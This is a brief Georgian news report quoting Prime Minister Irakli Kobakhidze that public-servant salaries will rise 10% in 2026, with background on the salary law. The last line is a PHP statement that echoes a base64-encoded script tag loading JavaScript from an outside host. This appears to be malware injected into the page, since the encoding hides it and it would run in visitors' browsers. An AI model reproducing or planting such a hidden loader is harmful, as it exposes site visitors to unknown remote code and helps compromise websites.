global distribution
გარე ავეჯი

საჯარო სამსახურში დასაქმებულებს ხელფასები კვლავ 10%-ით გაეზრდებათ, - ამის შესახებ პრემიერ-მინისტრმა ირაკლი კობახიძემ მთავრობის სხდომაზე განაცხადა.


„საჯარო სამსახურში ხელფასების მატება გაგრძელდება. როგორც მოგეხსენებათ გასული წლების განმავლობაში, ყოველწლიურად ხელფასები იმატებდა 10%-ით და 2026 წელსაც 10%-ით გაიზრდება საჯარო მოხელეთა ანაზღაურება,“ - განაცხადა კობახიძემ.

ცნობისთვის, 2021 წელს განხორციელებული საკანონმდებლო ცვლილებების საფუძველზე, მთლიანად საჯარო სექტორში დასაქმებულთათვის დაიწყო ხელფასების მოწესრიგება.

„საჯარო დაწესებულებაში შრომის ანაზღაურების შესახებ“ საქართველოს კანონის შესაბამისად სახელმწიფო ბიუჯეტით ყოველწლიურად განისაზღვრება საბაზო თანამდებობრივი სარგო, რაზეც მრავლდება თითოეული საბიუჯეტო ორგანიზაციის საშტატო განრიგით განსაზღვრული კოეფიციენტი და შესაბამისად განისაზღვრება საჯარო მოხელის ყოველთვიური ანაზღაურება.

120
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");